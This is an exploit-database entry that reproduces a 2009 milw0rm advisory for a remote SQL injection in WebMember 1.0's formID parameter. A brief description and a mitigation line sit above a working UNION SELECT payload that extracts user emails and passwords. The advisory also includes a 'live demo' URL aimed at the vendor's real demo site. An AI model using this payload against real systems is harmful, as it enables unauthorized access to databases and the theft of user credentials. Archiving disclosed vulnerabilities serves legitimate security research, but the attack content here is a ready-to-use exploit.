header-logo
Suggest Exploit
vendor:
WebMember
by:
KiM (ALGERIAN HaCkEr)
9,3
CVSS
HIGH
SQL Injection
89
CWE
Product Name: WebMember
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: N/A
CPE: a:phpmembers:webmember:1.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

WebMember 1.0 (formID) Remote SQL Injection Vulnerability

WebMember 1.0 (formID) is vulnerable to a remote SQL injection vulnerability. This vulnerability allows an attacker to inject arbitrary SQL code into the vulnerable application. This can be exploited to gain access to the database and to execute arbitrary commands on the system. The vulnerability is caused due to the formID parameter not being properly sanitized before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Mitigation:

Upgrade to the latest version of WebMember 1.0 (formID).
Source

Exploit-DB raw data:

==================================================================================================================
          SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM
          S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M
          SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M
              S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M
          SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M
===================================================SNAKES TEAM====================================================
                                                                                      
                             WebMember 1.0 (formID) Remote SQL Injection Vulnerability                                  
                                                                                                             
==============================================:::ALGERIAN HaCkEr:::===============================================
                =        =                                                                =          =
                =      =                Discovered By:  KiM   :::ALGERIAN HaCkEr:::         =     =  
                =                                                                                    =
                =    =    ************ ::::::home : www.snakespc.com/sc::::::***************     =   =
                =                                                                                    =
                =       =                 :::::E-mail : x0@hotmail.es:::::::               =         =
                =                                                                                    =
                =              Sript : http://www.phpmembers.com                                        =
                =               http://www.phpmembers.com/download.html                              =             
                 =================================== Snakespc ======================================   
   
[x] Note :You must Sign up......

[x] Exploit:
http://[host]/[script_path]/form.php?formID=-100 UNION SELECT 1,2,3,concat_ws(0x3e,email,password),5 FROM mem_user--
[x] Live demo:
http://demo.phpmembers.com/form.php?formID=-100 UNION SELECT 1,2,3,concat_ws(0x3e,email,password),5 FROM demo_user--

[x] Note2:
The injection's result will be in the link or inside the "Not Found" message
the default prefix of the table name is mem                                                         
===================================================================================================================
Greet'z : His0k4 ( My Love ^^ ) & Super_Cristal & CMOS_CLR17 & EVILWAY & Dr.OrYx & ALL ALGERIAN HACKERZ
str0ke.....>>>>.....milw0rm
===================================================================================================================

# milw0rm.com [2009-05-26]

Navigation

Suggest Exploit

Services By CQR